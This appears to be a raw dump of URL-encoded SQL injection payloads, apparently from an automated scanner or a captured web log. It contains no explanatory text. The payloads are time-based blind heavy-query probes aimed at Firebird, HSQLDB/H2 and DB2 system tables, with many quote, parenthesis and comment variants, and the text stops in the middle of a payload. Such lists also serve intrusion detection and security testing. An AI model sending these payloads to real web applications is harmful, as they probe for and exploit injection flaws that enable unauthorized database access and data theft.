1%22%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%281048%3D1048 1%29%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%289088%3D9088 1%29%29%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%286492%3D6492 1%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1%27%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%27HIzS%27%3D%27HIzS 1%27%29%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%27OnFc%27%3D%27OnFc 1%27%29%29%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%28%27jtId%27%3D%27jtId 1%27%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%27FgOT%27%3D%27FgOT 1%27%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%27yKHB%27%20LIKE%20%27yKHB 1%27%29%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%27suKe%27%20LIKE%20%27suKe 1%27%29%29%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%28%27Xhzm%27%20LIKE%20%27Xhzm 1%27%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%27egxk%27%20LIKE%20%27egxk 1%22%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%22aonA%22%3D%22aonA 1%22%29%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%22qZbx%22%3D%22qZbx 1%22%29%29%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%28%22Qpsd%22%3D%22Qpsd 1%22%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%22ILWg%22%3D%22ILWg 1%22%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%22FpaF%22%20LIKE%20%22FpaF 1%22%29%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%22Xhfc%22%20LIKE%20%22Xhfc 1%22%29%29%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%28%22utaS%22%20LIKE%20%22utaS 1%22%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%22Ahoy%22%20LIKE%20%22Ahoy 1%29%20WHERE%203281%3D3281%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1%27%29%20WHERE%206859%3D6859%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1%27%20WHERE%207462%3D7462%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1%22%20WHERE%203309%3D3309%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1%27%20%7C%7C%20%28SELECT%205257%20FROM%20DUAL%20WHERE%208773%3D8773%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209531%20WHERE%205932%3D5932%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%209652%20FROM%20DUAL%20WHERE%201876%3D1876%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29 1%20%2B%20%28SELECT%207108%20WHERE%208250%3D8250%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29 1%27%20%2B%20%28SELECT%20%27cDIZ%27%20FROM%20DUAL%20WHERE%209265%3D9265%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27sQIb%27%20WHERE%205370%3D5370%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%205279%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%23 1%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1%27%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1%27%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1%22%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%288510%3D8510 1%29%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%286586%3D6586 1%29%29%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%286527%3D6527 1%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1%27%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27Yfxs%27%3D%27Yfxs 1%27%29%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27uykR%27%3D%27uykR 1%27%29%29%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27lNss%27%3D%27lNss 1%27%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%27uXMH%27%3D%27uXMH 1%27%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27etvV%27%20LIKE%20%27etvV 1%27%29%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27UEYM%27%20LIKE%20%27UEYM 1%27%29%29%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27yUoA%27%20LIKE%20%27yUoA 1%27%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%27FLlR%27%20LIKE%20%27FLlR 1%22%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22aeUO%22%3D%22aeUO 1%22%29%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22xLRK%22%3D%22xLRK 1%22%29%29%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22PdJv%22%3D%22PdJv 1%22%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%22XYjm%22%3D%22XYjm 1%22%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22PIwd%22%20LIKE%20%22PIwd 1%22%29%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22Ugvg%22%20LIKE%20%22Ugvg 1%22%29%29%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22sydW%22%20LIKE%20%22sydW 1%22%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%22QBea%22%20LIKE%20%22QBea 1%29%20WHERE%201541%3D1541%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1%27%29%20WHERE%204964%3D4964%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1%27%20WHERE%204021%3D4021%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1%22%20WHERE%206234%3D6234%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1%27%20%7C%7C%20%28SELECT%206653%20FROM%20DUAL%20WHERE%201014%3D1014%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205877%20WHERE%208002%3D8002%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%203439%20FROM%20DUAL%20WHERE%204810%3D4810%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29 1%20%2B%20%28SELECT%208664%20WHERE%205133%3D5133%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29 1%27%20%2B%20%28SELECT%20%27YZqX%27%20FROM%20DUAL%20WHERE%201147%3D1147%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27roQZ%27%20WHERE%205895%3D5895%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%208785%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%23 1%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1%27%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1%27%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1%22%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%285590%3D5590 1%29%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%285367%3D5367 1%29%29%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%289455%3D9455 1%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1%27%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%27zEae%27%3D%27zEae 1%27%29%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%27eEYC%27%3D%27eEYC 1%27%29%29%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%28%27DtAv%27%3D%27DtAv 1%27%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%27mISU%27%3D%27mISU 1%27%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%27ympl%27%20LIKE%20%27ympl 1%27%29%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%27aOdl%27%20LIKE%20%27aOdl 1%27%29%29%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%28%27FYcj%27%20LIKE%20%27FYcj 1%27%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%27TLhI%27%20LIKE%20%27TLhI 1%22%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%22uBPi%22%3D%22uBPi 1%22%29%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%22DJOA%22%3D%22DJOA 1%22%29%29%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%28%22irgb%22%3D%22irgb 1%22%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%22CDkk%22%3D%22CDkk 1%22%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%22rruC%22%20LIKE%20%22rruC 1%22%29%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%22wysf%22%20LIKE%20%22wysf 1%22%29%29%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%28%22AAJH%22%20LIKE%20%22AAJH 1%22%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%22RwVZ%22%20LIKE%20%22RwVZ 1%29%20WHERE%202922%3D2922%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1%27%29%20WHERE%205661%3D5661%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1%27%20WHERE%202297%3D2297%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1%22%20WHERE%209455%3D9455%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1%27%20%7C%7C%20%28SELECT%203145%20FROM%20DUAL%20WHERE%207843%3D7843%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206704%20WHERE%206065%3D6065%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%202125%20FROM%20DUAL%20WHERE%202301%3D2301%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29 1%20%2B%20%28SELECT%209655%20WHERE%206794%3D6794%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29 1%27%20%2B%20%28SELECT%20%27jOYO%27%20FROM%20DUAL%20WHERE%208861%3D8861%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27CuMX%27%20WHERE%201448%3D1448%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%207089%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%23 1%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%27%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%27%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%22%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%285965%3D5965 1%29%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%286175%3D6175 1%29%29%29%20AND%205090%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%287096%3D7096 